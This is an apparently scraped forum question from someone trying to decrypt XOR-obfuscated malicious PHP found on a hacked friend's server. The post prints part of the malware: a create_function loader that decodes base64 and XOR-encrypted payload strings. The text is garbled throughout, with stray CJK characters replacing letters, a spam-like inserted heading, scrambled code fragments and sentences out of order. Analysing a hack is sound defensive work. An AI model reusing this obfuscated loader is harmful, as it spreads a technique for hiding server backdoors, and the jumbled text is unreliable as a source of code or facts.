I tried using every tool I could find to help with this ( xortool, XORRepeatingKe圜rypto, XORSearch & XORStrings, xorbruteforcer, iheartxor, NoMoreXOR) but mind you I'm not really trained to use any of those.īased on my analysis I suspect the key contains 圆2 and is either 32, 36, or 28 characters long, but again, I'm not an expert at this stuff.
Xor Encrypt Decrypt Php code#
Since the encrypted code creates a function, I assume it's executable PHP which likely has spaces, dollar signs, and other coding symbols. All the malicious files are the same, so I don't think we can use two of them to figure out the key. I obviously don't have access to the data stored in the cookie. ' ') $_igophqd($vewusl) įunction igophqd ($udopz, $bgsqhbl) 'anp9f3x/cxdoEURFPUEAEVUAVwEaF08USBQSPhdJE0JqandiYXNkbBQqZGMybC0uajU'. 'TI0XiNFJmRlJmslfmQmYgpmNGcBVHR1e1BydlNzcFJ2PTl7O3YiAwQ7ZAx5CEYZSRNC'. 'QBIHUzY1Fwdwd0fmVEK2F1J3EiJG8OViFwfiR1DF96MFg3ZjFndHN2BlF4cXYaYWIwe'. 'wc1YndjQ7fCR+NnBqJmIzXHQ5YlB4BGMNZndPYGVmZVt2ZgpqAydBJ3cyd0MoYTVQYi'. 'dSZhfDBYN1Y3Ugx0ZWZ8dHFyKFRmBWE2IwgWYjdgYS52E1ByJmI/cS5dY3x2T1VkZl8'. '2R7YUsjVnIOAwAifCt6IgJ5NWExcVEkWzx7I1IIcGVfbHFhcQVhYzBDASdrUHUhc182'. 'whA3UCUSZudDJcCmIuTXNWd094cWACK1JwDgYnM3wkZSBKeS9iMn1iM1w0agRNe1Z0B'. '0c2BxcQ5jcmISZn8gfQcna1B2IXB5NnsPZlQmdjNqJHd3fGJiD39/ZjNqciRyLDN/N3'. 'LSZsCmUhWkMtYjZXeylIUHojdw1mYVxvbHNLI1Z圜WY9JmwodiZkUwBhMWVvNEcrVyR'. 'gAVYCJjb3RjZQZuf2ZSY2RSdTMiCThiN2BhLHZVR2MicQ5iIwQBZXNAA3VmAlZpYQVc'. 'tzfxpqNiQIIHwgXmEjZTJ9djBlKH4xBE53dQdOfm9xFmZ0DmUiKWtQbiNgUzlwHFB0I'. 'xVXV3JWEkeyRnAVR2T2x1dGJXUnQOSzwgfCRSNnN9LWI2V20ncQ1xIXB/c2JfDmx2RC'. 'UnNgYgp1ZTBHJjNSFWYscFMiexNDYTNbKGs+TXR3cQdGdH9yU1NlIFc2InswUDFzVDR'. 'yd0VARiNkB0MwAGcCFgbFFiUHNncEsjVHEFegckCSBlImdDKGExYmUwYQl2N2BoZlJ1'. '54anFfWlVxcQZ3ZggGISNvIGI3YGE2YjVhbyZmEVY3BXtqZ094fWICK3xvUmUvMlE3c'. 'DJ0EndzJ3QzV7D3FRIlg3aSNZfGZhZmB4f2YFfGUwUDQnaDBnMWdmJGVUAFcyRxZrNF'. 'VRNSChUZGhAfX1FYQwpBU0IbBwBKBAJQbVQEUAtQUEEQTRQwXXtWcmJwZ29lVmhjIGo'.
$_igophqd = create_function ('$vewusl', igophqd (base64_decode ( $vewusl = 'ZW5jMTMz.XBzazt9KCRzJXMn' //Truncated from 1165 lines of encrypted data by me, the guy asking this question I'm wondering if someone here would be kind enough to walk me through what I would actually need to do to break the cipher. I can tell that they're using an XOR/Vigenère cipher and I've tried to learn everything I could about that on my own, but while I am a programmer I'm not a cryptographer and most of what I've found has gone over my head. My friend's server was recently hacked and I'm trying to decipher the malicious files I found in hopes of understanding the hack better.
0 kommentar(er)
